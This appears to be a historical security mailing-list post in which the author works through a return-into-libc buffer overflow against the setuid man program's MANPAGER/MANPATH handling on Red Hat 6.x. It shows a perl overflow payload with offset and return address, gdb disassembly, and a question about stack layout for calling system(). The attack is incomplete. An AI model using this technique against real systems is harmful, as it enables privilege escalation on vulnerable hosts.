No-Exec Stack Smashing 101

[lamont () ICOPYRIGHT COM (Granquist, Lamont)]

Thought I'd try to liven the discussion up here a bit...

Okay, so I'm setting off to exploit the /usr/bin/man MANPATH exploit on
RH6.1 (actually my system is RH6.2 i686 with man-1.5g-6 installed on it).
And I'm looking for a little help here.  What I've been playing with so
far is things like the following trying to sort out the parameters of the
buffer overflow:

setenv MANPAGER `perl -e 'print "A" x 4057; print "\xe0\xca\x05\x40";
/usr/bin/man man
gdb /usr/bin/man core

Now the goal is to make man do a system("/bin/echo i 0wn y3w") call via
returning into system() with the string being a parameter to the call with
no code being excuted on the stack.

What I've found out is:

1.  the RA is 4057 bytes beyond the start of the buffer
2.  the beginning of the buffer is 0xbfffeae5
3.  i have no idea how to properly call system()

#3 is where I need the help, since I'm relatively x86-architecture
and linux-kernel-hacking inexperienced.  Using this:

#include <stdio.h>

int main(void) {
  system("/bin/echo foobar");
}

I use gdb to disassemble to this:

Dump of assembler code for function main:
0x80483c8 <main>:       push   %ebp
0x80483c9 <main+1>:     mov    %esp,%ebp
0x80483cb <main+3>:     push   $0x8048430
0x80483d0 <main+8>:     call   0x80482e8 <system>
0x80483d5 <main+13>:    add    $0x4,%esp
0x80483d8 <main+16>:    leave
0x80483d9 <main+17>:    ret
End of assembler dump.

So, this appears to be system():

0x80483cb <main+3>:     push   $0x8048430
0x80483d0 <main+8>:     call   0x80482e8 <system>
0x80483d5 <main+13>:    add    $0x4,%esp

So, it looks like I tack "0xbfffeae5" after the RA at wherever the top
of the stack winds up being and system() will pop that off and off we
go.  However shoving 0x80482e8 into the RA like I naively assumed you
could do doesn't appear to work.  This is confirmed when I fire up gdb on
the core file from man and try:

(gdb) disassemble 0x80482e8
No function contains specified address.

OTOH i noticed this:

(gdb) disassemble system
Dump of assembler code for function __libc_system:
0x4005cae0 <__libc_system>:     push   %ebp
0x4005cae1 <__libc_system+1>:   mov    %esp,%ebp
0x4005cae3 <__libc_system+3>:   sub    $0x2c8,%esp
0x4005cae9 <__libc_system+9>:   push   %edi
0x4005caea <__libc_system+10>:  push   %esi
0x4005caeb <__libc_system+11>:  push   %ebx
0x4005caec <__libc_system+12>:  call   0x4005caf1 <__libc_system+17>
0x4005caf1 <__libc_system+17>:  pop    %ebx
0x4005caf2 <__libc_system+18>:  add    $0xaf6fb,%ebx
[...blah...blah...blah...]

So, anyone got any tips for where to point the RA and what the stack
should look like?